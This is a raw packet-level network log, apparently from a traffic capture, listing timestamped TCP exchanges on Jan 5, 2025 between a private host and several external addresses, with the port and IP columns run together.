                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612548113 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612557888 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612567902 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612579107 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612591028 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612725973 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612735987 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612746000 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612756968 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612767935 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612777948 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612793922 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612821102 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.612876892 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.613049030 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.613059998 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.613070011 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.613099098 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.657041073 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.699995041 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.713520050 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.719902992 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.736361980 CET8049712178.237.33.50192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.736475945 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.867259979 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:03.997131109 CET497097346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:04.002358913 CET734649709195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:04.733144999 CET8049712178.237.33.50192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:04.733217001 CET4971280192.168.2.6178.237.33.50
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:04.827569962 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:04.827605009 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:04.827685118 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:04.828277111 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:04.828291893 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.609522104 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.609608889 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.650304079 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.650322914 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.650518894 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.698143005 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.749926090 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.750082016 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.750092983 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.750466108 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.791348934 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.919723988 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.920000076 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.920046091 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.920219898 CET49713443192.168.2.640.113.110.67
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:05.920238972 CET4434971340.113.110.67192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.686155081 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.688296080 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.854278088 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.859177113 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.859190941 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.859206915 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.859217882 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.859235048 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.859247923 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.859272003 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.859291077 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.859334946 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.859350920 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.859380007 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.859421015 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.864097118 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.864106894 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.864181042 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.864190102 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.864284039 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.864294052 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.864301920 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.882541895 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.887552023 CET734649710195.133.78.18192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:06.887877941 CET497107346192.168.2.6195.133.78.18
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:07.000799894 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:08.650783062 CET44349705173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:08.650922060 CET49705443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.753462076 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.753503084 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.753781080 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.753950119 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:10.753962040 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.494580030 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.494883060 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.494906902 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.495261908 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.495274067 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.495341063 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.495347023 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.495400906 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.495933056 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.500257015 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.500313044 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.500555992 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.500560045 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.702754021 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.763119936 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.763155937 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.763204098 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.763226986 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.765870094 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.765922070 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.765927076 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.772140980 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.772192001 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.772197008 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.778426886 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.778474092 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.778480053 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.784670115 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.784718990 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.784724951 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.790942907 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.790996075 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.791001081 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.797251940 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.797314882 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.797321081 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.803450108 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.803498030 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.803508997 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.853446960 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.853478909 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.853497028 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.853502989 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.853557110 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.853562117 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.858179092 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.858222008 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.858227015 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.864427090 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.864484072 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.864490986 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.870706081 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.870752096 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.870757103 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.876950979 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.876995087 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.877002954 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.883189917 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.883233070 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.883239031 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.889502048 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.889544964 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.889550924 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.895766020 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.895812035 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.895817995 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.901818037 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.901879072 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.901885033 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.907033920 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.907073021 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.907078028 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.912461042 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.912503958 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.912509918 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.917789936 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.917838097 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.917844057 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.923367977 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.923409939 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.923417091 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.928685904 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.928731918 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.928740025 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.934170961 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.934225082 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.934237003 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.943912983 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.943938017 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.943962097 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.943970919 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.944016933 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.944021940 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.947350025 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.947393894 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.947402000 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.950948000 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.950993061 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.950999022 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.961210012 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.961240053 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.961266041 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.961273909 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.961313963 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.961364985 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.961604118 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.961647987 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.961658955 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.964958906 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.965013981 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.965018988 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.968483925 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.968539953 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.968544960 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.971934080 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.971992970 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.971997976 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.975375891 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.975440979 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.975445986 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.978936911 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.978986979 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.978992939 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.982337952 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.982388020 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.982393980 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.985877037 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.985932112 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.985935926 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.989353895 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.989406109 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.989411116 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.992749929 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.992916107 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.992921114 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.996251106 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.996308088 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.996313095 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.999608994 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.999671936 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:11.999696016 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.003083944 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.003140926 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.003150940 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.008352995 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.008400917 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.008407116 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.009855986 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.009916067 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.009921074 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.013755083 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.013804913 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.013809919 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.016391039 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.016441107 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.016447067 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.019551992 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.019587994 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.019604921 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.019610882 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.019653082 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.022579908 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.025590897 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.025619984 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.025641918 CET49728443192.168.2.6142.250.185.129
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.025650024 CET44349728142.250.185.129192.168.2.6
                                                                                                                                                                                                                                                                                                                            Jan 5, 2025 08:39:12.025700092 CET49728443192.168.2.6142.250.185.129
